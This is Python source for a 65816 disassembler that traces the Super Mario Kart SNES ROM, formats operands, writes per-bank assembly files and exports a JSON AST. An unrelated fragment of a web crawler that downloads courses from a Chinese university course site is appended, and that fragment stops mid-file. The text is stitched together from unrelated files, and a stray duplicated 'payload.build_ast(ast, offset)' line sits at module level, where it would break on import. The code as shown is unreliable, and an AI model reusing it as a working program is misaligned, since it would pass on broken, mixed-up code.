        operand_size: number of operand bytes (0-3).

    Returns:
        The operand as an int, or None when there is no operand
        (operand_size 0 or unrecognised).

    Raises:
        IndexError: if *rom_data* holds fewer than *operand_size* bytes
            (matches the original per-index access behavior).
    """
    if operand_size in (1, 2, 3):
        chunk = rom_data[:operand_size]
        if len(chunk) < operand_size:
            raise IndexError("operand runs past end of data")
        return int.from_bytes(bytes(chunk), 'little')
    return None
# --- operand formatters -------------------------------------------------
# One formatter per addressing mode; each returns the assembly operand
# text for value *v*.  *size* (operand byte count) only matters for the
# flag-dependent immediate modes (ImmX / ImmM), but every formatter
# accepts it so they can all be called uniformly via
# address_mode_dispatch[mode](operand, operand_size).

def handle_Sig8(v, size=0):
    """8-bit signature byte, rendered as an immediate."""
    return f"#${v:02X}"

def handle_Imm8(v, size=0):
    """Fixed 8-bit immediate."""
    return f"#${v:02X}"

def handle_Imm16(v, size=0):
    """Fixed 16-bit operand; rendered without '#' (original behavior)."""
    return f"${v:04X}"

def handle_ImmX(v, size):
    """Immediate whose width follows the index-register (X) mode."""
    return f"#${v:02X}" if size == 1 else f"#${v:04X}"

def handle_ImmM(v, size):
    """Immediate whose width follows the accumulator (M) mode."""
    return f"#${v:02X}" if size == 1 else f"#${v:04X}"

def handle_Abs(v, size=0):
    return f"${v:04X}"

def handle_AbsIdxXInd(v, size=0):
    return f"(${v:04X},x)"

def handle_AbsIdxX(v, size=0):
    return f"${v:04X},x"

def handle_AbsIdxY(v, size=0):
    return f"${v:04X},y"

def handle_AbsInd(v, size=0):
    return f"(${v:04X})"

def handle_AbsIndLng(v, size=0):
    return f"[${v:04X}]"

def handle_AbsLngIdxX(v, size=0):
    return f"${v:06X},x"

def handle_AbsLng(v, size=0):
    return f"${v:06X}"

def handle_AbsJmp(v, size=0):
    return f"(${v:04X})"

def handle_AbsLngJmp(v, size=0):
    return f"${v:06X}"

def handle_Acc(v, size=0):
    """Accumulator mode has no operand text."""
    return None

def handle_BlkMov(v, size=0):
    """Block move: high operand byte printed first, then low."""
    high = (v & 0xFF00) >> 8
    low = v & 0x00FF
    return f"${high:02X},${low:02X}"

def handle_DirIdxIndX(v, size=0):
    return f"(${v:02X},x)"

def handle_DirIdxX(v, size=0):
    return f"${v:02X},x"

def handle_DirIdxY(v, size=0):
    return f"${v:02X},y"

def handle_DirIndIdxY(v, size=0):
    return f"(${v:02X}),y"

def handle_DirIndLngIdxY(v, size=0):
    return f"[${v:02X}],y"

def handle_DirIndLng(v, size=0):
    return f"[${v:02X}]"

def handle_DirInd(v, size=0):
    return f"(${v:02X})"

def handle_Dir(v, size=0):
    return f"${v:02X}"

def handle_Imp(v, size=0):
    """Implied mode has no operand text.

    BUGFIX: the original omitted the *size* parameter every sibling
    formatter has, so dispatching it with two arguments would raise
    TypeError.
    """
    return None

def handle_RelLng(v, size=0):
    return f"${v:04X}"

def handle_Rel(v, size=0):
    return f"${v:02X}"

def handle_Stk(v, size=0):
    """Stack mode has no operand text."""
    return None

def handle_StkRel(v, size=0):
    return f"${v:02X},s"

def handle_StkRelIndIdxY(v, size=0):
    return f"(${v:02X},s),y"
# Maps each addressing mode to the formatter that renders its operand text.
address_mode_dispatch = {AddressMode.Sig8: handle_Sig8,
                         AddressMode.Imm8: handle_Imm8,
                         AddressMode.Imm16: handle_Imm16,
                         AddressMode.ImmX: handle_ImmX,
                         AddressMode.ImmM: handle_ImmM,
                         AddressMode.Abs: handle_Abs,
                         AddressMode.AbsIdxXInd: handle_AbsIdxXInd,
                         AddressMode.AbsIdxX: handle_AbsIdxX,
                         AddressMode.AbsIdxY: handle_AbsIdxY,
                         AddressMode.AbsInd: handle_AbsInd,
                         AddressMode.AbsIndLng: handle_AbsIndLng,
                         AddressMode.AbsLngIdxX: handle_AbsLngIdxX,
                         AddressMode.AbsLng: handle_AbsLng,
                         AddressMode.AbsJmp: handle_AbsJmp,
                         AddressMode.AbsLngJmp: handle_AbsLngJmp,
                         AddressMode.Acc: handle_Acc,
                         AddressMode.BlkMov: handle_BlkMov,
                         AddressMode.DirIdxIndX: handle_DirIdxIndX,
                         AddressMode.DirIdxX: handle_DirIdxX,
                         AddressMode.DirIdxY: handle_DirIdxY,
                         AddressMode.DirIndIdxY: handle_DirIndIdxY,
                         AddressMode.DirIndLngIdxY: handle_DirIndLngIdxY,
                         AddressMode.DirIndLng: handle_DirIndLng,
                         AddressMode.DirInd: handle_DirInd,
                         AddressMode.Dir: handle_Dir,
                         AddressMode.Imp: handle_Imp,
                         AddressMode.RelLng: handle_RelLng,
                         AddressMode.Rel: handle_Rel,
                         AddressMode.Stk: handle_Stk,
                         AddressMode.StkRel: handle_StkRel,
                         AddressMode.StkRelIndIdxY: handle_StkRelIndIdxY}
# Addressing mode for each opcode byte $00-$FF, indexed by opcode value.
opcode_address_modes = [AddressMode.Sig8, AddressMode.DirIdxIndX, AddressMode.Sig8, AddressMode.StkRel, AddressMode.Dir,
                        AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Stk, AddressMode.ImmM,
                        AddressMode.Acc,
                        AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
                        AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
                        AddressMode.Dir, AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIndLngIdxY,
                        AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Acc, AddressMode.Imp, AddressMode.Abs,
                        AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsLngIdxX,
                        AddressMode.Abs, AddressMode.DirIdxIndX, AddressMode.AbsLng, AddressMode.StkRel,
                        AddressMode.Dir, AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Stk,
                        AddressMode.ImmM, AddressMode.Acc,
                        AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
                        AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
                        AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIdxX,
                        AddressMode.DirIndLngIdxY, AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Acc,
                        AddressMode.Imp, AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsIdxX,
                        AddressMode.AbsLngIdxX,
                        AddressMode.Stk, AddressMode.DirIdxIndX, AddressMode.Imm8, AddressMode.StkRel,
                        AddressMode.BlkMov, AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Stk,
                        AddressMode.ImmM,
                        AddressMode.Acc, AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs,
                        AddressMode.AbsLng,
                        AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
                        AddressMode.BlkMov, AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIndLngIdxY,
                        AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Stk, AddressMode.Imp, AddressMode.AbsLng,
                        AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsLngIdxX,
                        AddressMode.Stk, AddressMode.DirIdxIndX, AddressMode.RelLng, AddressMode.StkRel,
                        AddressMode.Dir, AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Stk,
                        AddressMode.ImmM, AddressMode.Acc,
                        AddressMode.Stk, AddressMode.AbsInd, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
                        AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
                        AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIdxX,
                        AddressMode.DirIndLngIdxY, AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Stk,
                        AddressMode.Imp, AddressMode.AbsIdxXInd, AddressMode.AbsIdxX, AddressMode.AbsIdxX,
                        AddressMode.AbsLngIdxX,
                        AddressMode.Rel, AddressMode.DirIdxIndX, AddressMode.RelLng, AddressMode.StkRel,
                        AddressMode.Dir, AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Imp,
                        AddressMode.ImmM, AddressMode.Imp,
                        AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
                        AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
                        AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIdxY,
                        AddressMode.DirIndLngIdxY, AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Imp,
                        AddressMode.Imp, AddressMode.Abs, AddressMode.AbsIdxX, AddressMode.AbsIdxX,
                        AddressMode.AbsLngIdxX,
                        AddressMode.ImmX, AddressMode.DirIdxIndX, AddressMode.ImmX, AddressMode.StkRel, AddressMode.Dir,
                        AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Imp, AddressMode.ImmM,
                        AddressMode.Imp,
                        AddressMode.Stk, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
                        AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
                        AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIdxY,
                        AddressMode.DirIndLngIdxY, AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Imp,
                        AddressMode.Imp, AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsIdxY,
                        AddressMode.AbsLngIdxX,
                        AddressMode.ImmX, AddressMode.DirIdxIndX, AddressMode.Imm8, AddressMode.StkRel, AddressMode.Dir,
                        AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Imp, AddressMode.ImmM,
                        AddressMode.Imp,
                        AddressMode.Imp, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
                        AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
                        AddressMode.Dir, AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIndLngIdxY,
                        AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Stk, AddressMode.Imp, AddressMode.AbsIndLng,
                        AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsLngIdxX,
                        AddressMode.ImmX, AddressMode.DirIdxIndX, AddressMode.Imm8, AddressMode.StkRel, AddressMode.Dir,
                        AddressMode.Dir, AddressMode.Dir, AddressMode.DirIndLng, AddressMode.Imp, AddressMode.ImmM,
                        AddressMode.Imp,
                        AddressMode.Imp, AddressMode.Abs, AddressMode.Abs, AddressMode.Abs, AddressMode.AbsLng,
                        AddressMode.Rel, AddressMode.DirIndIdxY, AddressMode.DirInd, AddressMode.StkRelIndIdxY,
                        AddressMode.Imm16, AddressMode.DirIdxX, AddressMode.DirIdxX, AddressMode.DirIndLngIdxY,
                        AddressMode.Imp, AddressMode.AbsIdxY, AddressMode.Stk, AddressMode.Imp, AddressMode.AbsIdxXInd,
                        AddressMode.AbsIdxX, AddressMode.AbsIdxX, AddressMode.AbsLngIdxX]
# Mnemonic for each opcode byte $00-$FF, indexed by opcode value.
opcodes = ["BRK", "ORA", "COP", "ORA", "TSB", "ORA", "ASL", "ORA", "PHP", "ORA", "ASL", "PHD", "TSB", "ORA", "ASL",
           "ORA",
           "BPL", "ORA", "ORA", "ORA", "TRB", "ORA", "ASL", "ORA", "CLC", "ORA", "INC", "TCS", "TRB", "ORA", "ASL",
           "ORA",
           "JSR", "AND", "JSL", "AND", "BIT", "AND", "ROL", "AND", "PLP", "AND", "ROL", "PLD", "BIT", "AND", "ROL",
           "AND",
           "BMI", "AND", "AND", "AND", "BIT", "AND", "ROL", "AND", "SEC", "AND", "DEC", "TSC", "BIT", "AND", "ROL",
           "AND",
           "RTI", "EOR", "WDM", "EOR", "MVP", "EOR", "LSR", "EOR", "PHA", "EOR", "LSR", "PHK", "JMP", "EOR", "LSR",
           "EOR",
           "BVC", "EOR", "EOR", "EOR", "MVN", "EOR", "LSR", "EOR", "CLI", "EOR", "PHY", "TCD", "JMP", "EOR", "LSR",
           "EOR",
           "RTS", "ADC", "PER", "ADC", "STZ", "ADC", "ROR", "ADC", "PLA", "ADC", "ROR", "RTL", "JMP", "ADC", "ROR",
           "ADC",
           "BVS", "ADC", "ADC", "ADC", "STZ", "ADC", "ROR", "ADC", "SEI", "ADC", "PLY", "TDC", "JMP", "ADC", "ROR",
           "ADC",
           "BRA", "STA", "BRL", "STA", "STY", "STA", "STX", "STA", "DEY", "BIT", "TXA", "PHB", "STY", "STA", "STX",
           "STA",
           "BCC", "STA", "STA", "STA", "STY", "STA", "STX", "STA", "TYA", "STA", "TXS", "TXY", "STZ", "STA", "STZ",
           "STA",
           "LDY", "LDA", "LDX", "LDA", "LDY", "LDA", "LDX", "LDA", "TAY", "LDA", "TAX", "PLB", "LDY", "LDA", "LDX",
           "LDA",
           "BCS", "LDA", "LDA", "LDA", "LDY", "LDA", "LDX", "LDA", "CLV", "LDA", "TSX", "TYX", "LDY", "LDA", "LDX",
           "LDA",
           "CPY", "CMP", "REP", "CMP", "CPY", "CMP", "DEC", "CMP", "INY", "CMP", "DEX", "WAI", "CPY", "CMP", "DEC",
           "CMP",
           "BNE", "CMP", "CMP", "CMP", "PEI", "CMP", "DEC", "CMP", "CLD", "CMP", "PHX", "STP", "JML", "CMP", "DEC",
           "CMP",
           "CPX", "SBC", "SEP", "SBC", "CPX", "SBC", "INC", "SBC", "INX", "SBC", "NOP", "XBA", "CPX", "SBC", "INC",
           "SBC",
           "BEQ", "SBC", "SBC", "SBC", "PEA", "SBC", "INC", "SBC", "SED", "SBC", "PLX", "XCE", "JSR", "SBC", "INC",
           "SBC"]
def get_addr_mode_from_opcode_value(opcode_value):
    """Look up the addressing mode for an opcode byte (0-255)."""
    return opcode_address_modes[opcode_value]
class Data:
    """A single raw ROM byte rendered as a `db` directive."""

    def __init__(self, value=0xff):
        self.value = value

    def render(self, output, bank_num, bank_offset):
        """Write `db $XX` right-padded with a `; $ADDRESS` comment."""
        address_comment = f"; ${bank_num | bank_offset:06X}\n"
        directive = f"\tdb ${self.value:02X}"
        padding = ASSEMBLY_OUTPUT_LINE_WIDTH - len(directive)
        output.write(f"{directive}{address_comment:>{padding}}")

    def build_ast(self, ast, offset):
        """Raw data bytes contribute nothing to the AST."""
        pass
class Instruction:
    """A decoded 65816 instruction plus the label bookkeeping it triggers.

    Constructing an Instruction registers a label offset in *labels_set*
    for every jump/branch target, and for the instruction following an
    unconditional jump (which is otherwise unreachable by fall-through).
    """

    def __init__(self, opcode, current_memory_mode, current_index_mode, rom_data_from_operand_addr, bank_index, bank_offset, labels_set, func_names, pc):
        addr_mode = get_addr_mode_from_opcode_value(opcode)
        self.opcode = opcode
        self.operand_size = get_operand_size(addr_mode, current_memory_mode, current_index_mode)
        self.addr_mode = addr_mode
        self.operand = get_operand(rom_data_from_operand_addr, self.operand_size)
        self.memory_mode = current_memory_mode
        self.index_mode = current_index_mode
        self.instruction_string = ""
        self.func_names = func_names
        self.pc = pc
        self.jump_label_name = None
        if opcode in [0x4C, 0x20]:
            # JMP/JSR absolute: 16-bit target within the current bank.
            self.jump_label_name = f"CODE_{(BANK_START + bank_index) << 16 | self.operand:0{6}X}"
            offset_of_jump_target = (bank_index * BANK_SIZE) + self.operand
            labels_set.add(offset_of_jump_target)
        elif opcode in [0x22, 0x5C]:
            # JSL/JML absolute long: operand is a full 24-bit runtime address.
            addr, jump_bank, jump_offset = convert_runtime_address_to_rom(self.operand)
            self.jump_label_name = f"CODE_{(BANK_START + jump_bank) << 16 | jump_offset:0{6}X}"
            offset_of_jump_target = (jump_bank * BANK_SIZE) + jump_offset
            labels_set.add(offset_of_jump_target)
        elif opcode in [0x90, 0xB0, 0xF0, 0x30, 0xD0, 0x10, 0x80, 0x50, 0x70]:
            # Conditional branches and BRA: signed 8-bit displacement
            # relative to the byte after this 2-byte instruction.
            jump_amount_signed = self.operand - 256 if self.operand > 127 else self.operand
            jump_offset = (bank_offset + 2 + jump_amount_signed) & 0xFFFF
            self.jump_label_name = f"CODE_{(BANK_START + bank_index) << 16 | jump_offset:0{6}X}"
            offset_of_jump_target = (bank_index * BANK_SIZE) + jump_offset
            labels_set.add(offset_of_jump_target)
        elif opcode in [0x82]:
            # BRL: signed 16-bit displacement relative to the byte after
            # this 3-byte instruction.
            # BUGFIX: this branch previously tested 0x80 (BRA), which the
            # 8-bit case above already consumes, so it was unreachable and
            # BRL targets never received labels.  0x82 is the 16-bit
            # relative opcode the +3/65536 arithmetic matches.
            jump_amount_signed = self.operand - 65536 if self.operand > 32767 else self.operand
            jump_offset = (bank_offset + 3 + jump_amount_signed) & 0xFFFF
            self.jump_label_name = f"CODE_{(BANK_START + bank_index) << 16 | jump_offset:0{6}X}"
            offset_of_jump_target = (bank_index * BANK_SIZE) + jump_offset
            labels_set.add(offset_of_jump_target)
        if opcode == 0x80:
            # BUGFIX: was `opcode is 0x80` — identity comparison of ints,
            # which only works via CPython's small-int cache.
            # BRA never falls through, so the next byte starts a new
            # reachable block and needs its own label.
            offset_of_next_instruction = (bank_index * BANK_SIZE) + ((bank_offset + 2) & 0xFFFF)
            labels_set.add(offset_of_next_instruction)
        elif opcode in [0x4C, 0x6C, 0x7C, 0xDC]:
            # Unconditional 3-byte jumps: label the instruction after them.
            offset_of_next_instruction = (bank_index * BANK_SIZE) + ((bank_offset + 3) & 0xFFFF)
            labels_set.add(offset_of_next_instruction)

    def render(self, output, bank_num, bank_offset):
        """Write this instruction as assembly text with a `; $ADDRESS` comment.

        Also caches the bare text in self.instruction_string for build_ast.
        """
        comment_addr = bank_num | bank_offset
        comment_string = f"; ${comment_addr:0{6}X}\n"
        opcode_string = f"\t{opcodes[self.opcode]}"
        if self.operand is None:
            width = ASSEMBLY_OUTPUT_LINE_WIDTH - len(opcode_string)
            output.write(f"{opcode_string}{comment_string:>{width}}")
            self.instruction_string = f"{opcodes[self.opcode]}"
        else:
            operand_string = address_mode_dispatch[self.addr_mode](self.operand, self.operand_size)
            # Replace known hardware register addresses with symbolic names.
            if operand_string in hardware_registers:
                operand_string = hardware_registers[operand_string]
            width = ASSEMBLY_OUTPUT_LINE_WIDTH - (len(opcode_string) + len(operand_string) + 1)
            output.write(f"{opcode_string} {operand_string}{comment_string:>{width}}")
            self.instruction_string = f"{opcodes[self.opcode]} {operand_string}"

    def build_ast(self, ast, offset):
        """Append this instruction's AST node; fields vary with operand/label."""
        if self.operand is not None:
            if self.jump_label_name is not None:
                ast.append({"Instruction": {"offset": offset, "pc": self.pc, "instruction_string": self.instruction_string, "opcode": self.opcode, "operand": self.operand, "jump_label_name": self.jump_label_name, "operand_size": self.operand_size, "memory_mode": 1 if self.memory_mode is MemoryMode.EIGHT_BIT else 0, "index_mode": 1 if self.index_mode is MemoryMode.EIGHT_BIT else 0, "func_names" : self.func_names}})
            else:
                ast.append({"Instruction": {"offset": offset, "pc": self.pc, "instruction_string": self.instruction_string, "opcode": self.opcode, "operand": self.operand, "operand_size": self.operand_size, "memory_mode": 1 if self.memory_mode is MemoryMode.EIGHT_BIT else 0, "index_mode": 1 if self.index_mode is MemoryMode.EIGHT_BIT else 0, "func_names" : self.func_names}})
        else:
            ast.append({"Instruction": {"offset": offset, "pc": self.pc, "instruction_string": self.instruction_string, "opcode": self.opcode, "memory_mode": 1 if self.memory_mode is MemoryMode.EIGHT_BIT else 0, "index_mode": 1 if self.index_mode is MemoryMode.EIGHT_BIT else 0,"func_names" : self.func_names}})
class InstructionOperand:
    """Placeholder for an operand byte owned by a preceding Instruction."""

    def __init__(self, value):
        self.value = value

    def render(self, output, bank_num, bank_offset):
        """Operand bytes are rendered by their owning Instruction."""
        pass

    def build_ast(self, ast, offset):
        """Operand bytes contribute nothing to the AST."""
        pass
class Bank:
    """One 64KB ROM bank holding a payload entry per byte offset.

    Each payload slot is None, a Data byte, an Instruction, or an
    InstructionOperand.
    """

    def __init__(self, bank_index):
        # One payload slot per byte in the bank.
        self.payload = [None for _ in range(BANK_SIZE)]
        self.bank_index = bank_index
        # 24-bit base address of this bank in the output's address space.
        self.bank_num = (BANK_START + bank_index) << 16
    def render(self, output, labels_set):
        """Write the whole bank as assembly, emitting labels from *labels_set*."""
        for (bank_offset, payload) in enumerate(self.payload):
            if bank_offset == 0x0000:
                # NOTE(review): lower half uses a hardcoded $40 bank base
                # while the upper half uses BANK_START — confirm this
                # mirroring split is intended.
                code_addr = (0x40 + self.bank_index) << 16
                output.write(f"\norg ${code_addr:0{6}X}\n")
            elif bank_offset == 0x8000:
                code_addr = ((BANK_START + self.bank_index) << 16) + bank_offset
                output.write(f"\norg ${code_addr:0{6}X}\n")
            if payload is not None:
                offset = (self.bank_index * BANK_SIZE) + bank_offset
                if offset in labels_set:
                    output.write("\n")
                    output.write(f"CODE_{self.bank_num | bank_offset:0{6}X}:\n")
                payload.render(output, self.bank_num, bank_offset)
    def build_ast(self, ast, labels_set):
        """Append Label and payload AST nodes for every occupied slot."""
        for (bank_offset, payload) in enumerate(self.payload):
            if payload is not None:
                offset = (self.bank_index * BANK_SIZE) + bank_offset
                if offset in labels_set:
                    ast.append({"Label": {"offset": offset, "name": f"CODE_{self.bank_num | bank_offset:0{6}X}"}})
                payload.build_ast(ast, offset)
payload.build_ast(ast, offset)
class Disassembly:
    """Whole-ROM disassembly: a Bank per 64KB plus interrupt-vector labels."""

    def __init__(self, labels_set, rom):
        self.banks = [Bank(i) for i in range(NUM_BANKS)]
        self.labels_set = labels_set
        # Read the RESET/NMI/IRQ vectors from the ROM header and register
        # labels plus FUNC_ names for their handlers.
        addr_reset, bank_reset, bank_offset_reset = convert_runtime_address_to_rom(get_operand(rom[ROM_RESET_ADDR:], 2))
        self.labels_set.add((bank_reset * BANK_SIZE) + bank_offset_reset)
        self.rom_reset_func_name = f"FUNC_{((BANK_START + bank_reset) << 16) | bank_offset_reset:0{6}X}"
        self.rom_reset_addr = addr_reset
        addr_nmi, bank_nmi, bank_offset_nmi = convert_runtime_address_to_rom(get_operand(rom[ROM_NMI_ADDR:], 2))
        self.labels_set.add((bank_nmi * BANK_SIZE) + bank_offset_nmi)
        self.rom_nmi_func_name = f"FUNC_{((BANK_START + bank_nmi) << 16) | bank_offset_nmi:0{6}X}"
        addr_irq, bank_irq, bank_offset_irq = convert_runtime_address_to_rom(get_operand(rom[ROM_IRQ_ADDR:], 2))
        self.labels_set.add((bank_irq * BANK_SIZE) + bank_offset_irq)
        self.rom_irq_func_name = f"FUNC_{((BANK_START + bank_irq) << 16) | bank_offset_irq:0{6}X}"
    def mark_as_data(self, bank, bank_offset, data):
        """Mark one byte as raw data (unconditionally overwrites the slot)."""
        self.banks[bank].payload[bank_offset] = Data(data)
    def mark_as_instruction(self, bank, bank_offset, opcode, current_memory_mode, current_index_mode,
                            rom_data_from_operand_addr, func_names, pc):
        """Mark a slot as an instruction; returns False if it would overlap.

        Overlap handling keeps the output reassemblable byte-for-byte.
        """
        # detect the case where the original assembly employed space saving technique utilising part of the previous
        # instruction operand as the opcode.
        # if the address we were going to write the instruction to is part of a previous InstructionOperand
        # then we bail out as we want to leave this bit as data to be able to reassemble
        if isinstance(self.banks[bank].payload[bank_offset], InstructionOperand):
            return False
        addr_mode = get_addr_mode_from_opcode_value(opcode)
        operand_size = get_operand_size(addr_mode, current_memory_mode, current_index_mode)
        # Likewise bail out if this instruction's bytes would overwrite an
        # already-placed instruction.
        for i in range(operand_size+1):
            if isinstance(self.banks[bank].payload[bank_offset + i], Instruction):
                return False
        self.banks[bank].payload[bank_offset] = Instruction(opcode=opcode,
                                                            current_memory_mode=current_memory_mode,
                                                            current_index_mode=current_index_mode,
                                                            rom_data_from_operand_addr=rom_data_from_operand_addr,
                                                            bank_index=bank,
                                                            bank_offset=bank_offset,
                                                            labels_set=self.labels_set,
                                                            func_names=func_names,
                                                            pc=pc)
        # Claim the operand bytes so later opcodes cannot land inside them.
        for i in range(1, operand_size+1):
            self.banks[bank].payload[bank_offset + i] = InstructionOperand(rom_data_from_operand_addr[i])
        return True
    def render(self):
        """Write one bankNN.asm file per bank (header directives in bank 0)."""
        for (bank_index, bank) in enumerate(self.banks):
            bank_output = io.StringIO()
            if bank_index == 0:
                bank_output.write(f"hirom\n\narch 65816\n\n")
            bank.render(bank_output, self.labels_set)
            with open(f"bank{bank_index:0{2}d}.asm", 'w') as f:
                f.write(bank_output.getvalue())
    def build_ast(self, ast):
        """Append every bank's AST nodes to *ast* in bank order."""
        for bank in self.banks:
            bank.build_ast(ast, self.labels_set)
    def write_ast(self, output_filename, offset_to_function_name, jump_tables, function_names, labels_to_functions, return_address_manipulation_functions):
        """Serialize the AST and all side tables as JSON to *output_filename*.

        Dicts with non-string keys are converted to item lists so JSON can
        represent them.
        """
        with open(output_filename, 'w') as f:
            ast = []
            self.build_ast(ast)
            ast_dict = {"ast": ast}
            ast_dict["rom_reset_func_name"] = self.rom_reset_func_name
            ast_dict["rom_reset_addr"] = self.rom_reset_addr
            ast_dict["rom_nmi_func_name"] = self.rom_nmi_func_name
            ast_dict["rom_irq_func_name"] = self.rom_irq_func_name
            ast_dict["offset_to_function_name"] = list(offset_to_function_name.items())
            jump_tables_as_list = {}
            for k, v in jump_tables.items():
                jump_tables_as_list[k] = list(v.items())
            ast_dict["jump_tables"] = list(jump_tables_as_list.items())
            ast_dict["function_names"] = list(function_names)
            ast_dict["labels_to_functions"] = list(labels_to_functions.items())
            ast_dict["return_address_manipulation_functions"] = return_address_manipulation_functions
            json.dump(ast_dict, f)
if __name__ == "__main__":
    labels_set, labels_to_functions = open_label_addresses("labels.txt")
    rom = open_rom("Super Mario Kart (USA).sfc")
    disassembly = Disassembly(labels_set, rom)
    # Start with every ROM byte marked as data; traced instructions
    # overwrite their bytes below.
    for (addr, d) in enumerate(rom):
        bank, bank_offset = get_bank_and_offset(addr)
        disassembly.mark_as_data(bank=bank, bank_offset=bank_offset, data=d)
    offset_to_function_name = open_pc_to_fixed_func_name("pcToFixedFuncName.txt")
    jump_tables = open_jump_tables("jumpTablePCToFuncName.txt")
    # Collect every real function name; plain CODE_ labels don't count.
    function_names = set(offset_to_function_name.values())
    for jump_table_entries in jump_tables.values():
        for function_name in jump_table_entries.values():
            if "CODE_" not in function_name:
                function_names.add(function_name)
    return_address_manipulation_functions = open_return_address_manipulation_functions("returnAddressManipulationFunctions.txt")
    current_memory_mode = MemoryMode.EIGHT_BIT
    current_index_mode = MemoryMode.EIGHT_BIT
    executed_instruction_info = open_executed_instruction_addresses("instruction_trace.txt")
    for instruction_info in executed_instruction_info:
        for func_name in instruction_info.func_names:
            function_names.add(func_name)
        # BUGFIX: was `is 1`, an identity comparison on an int that only
        # works via CPython's small-int cache (and warns on 3.8+).
        current_memory_mode = MemoryMode.EIGHT_BIT if instruction_info.memory_mode == 1 else MemoryMode.SIXTEEN_BIT
        current_index_mode = MemoryMode.EIGHT_BIT if instruction_info.index_mode == 1 else MemoryMode.SIXTEEN_BIT
        rom_addr, bank, bank_offset = convert_runtime_address_to_rom(instruction_info.runtime_addr)
        if rom_addr in labels_to_functions:
            # Record additional functions observed executing this label.
            for func_name in instruction_info.func_names:
                if func_name not in labels_to_functions[rom_addr]:
                    labels_to_functions[rom_addr][func_name] = False
        opcode_value = rom[rom_addr]
        disassembly.mark_as_instruction(bank=bank, bank_offset=bank_offset, opcode=opcode_value,
                                        current_memory_mode=current_memory_mode, current_index_mode=current_index_mode,
                                        rom_data_from_operand_addr=rom[rom_addr+1:], func_names=instruction_info.func_names, pc=instruction_info.runtime_addr)
    disassembly.render()
    disassembly.write_ast("super_mario_kart_ast.json", offset_to_function_name, jump_tables, function_names, labels_to_functions, return_address_manipulation_functions)
|
<filename>moocs/livedu.py<gh_stars>10-100
# -*- coding: utf-8 -*-
"""北京高校优质课程研究会"""
import time
from bs4 import BeautifulSoup
from moocs.utils import *
from utils.crawler import Crawler
name = "livedu"
need_cookies = True
CANDY = Crawler()
CONFIG = {}
FILES = {}
VIDEOS = []
exports = {}
__all__ = ["name", "need_cookies", "start", "exports"]
def get_summary(url):
    """Fetch course id, title and chapter names from the course page.

    Side effects: stores course_id / study_soup / chapter_names in CONFIG
    for later use by get_resource.

    Returns:
        (course_id, dir_name) tuple.
    """
    course_id = re.search(r'kcid=(?P<course_id>\d+)', url).group('course_id')
    data = {
        'kcid': course_id,
        'kcdm': course_id,
    }
    res = CANDY.post(CONFIG['study_page'], data=data)
    study_soup = BeautifulSoup(res.text, 'html.parser')
    name = study_soup.find(
        'dl', class_='content-a-title').find('dt').find('span').string
    home_text = CANDY.get(url).text
    home_soup = BeautifulSoup(home_text, 'html.parser')
    chapter_names = []
    # insert(0, ...) reverses document order; get_resource pops from the
    # end of the list to recover it.
    if home_soup.find('div', class_='vice-main-kcap'):
        for chapter_lable in home_soup.find('div', class_='vice-main-kcap')\
                .find('ul')\
                .children:
            try:
                chapter_names.insert(
                    0, chapter_lable.find('div').find('span').string)
            except Exception:
                # BUGFIX: was a bare `except:`.  Non-tag children (text
                # nodes) raise here and are skipped on purpose, but a bare
                # except also swallows KeyboardInterrupt/SystemExit.
                pass
    else:
        for chapter_lable in home_soup.find('div', id='accordion')\
                .find_all('h3'):
            chapter_names.insert(0, chapter_lable.text)
    dir_name = course_dir(name, '北京高校优质课程研究会')
    print(dir_name)
    CONFIG['course_id'] = course_id
    CONFIG['study_soup'] = study_soup
    CONFIG['chapter_names'] = chapter_names
    return course_id, dir_name
def parse_resource(resource):
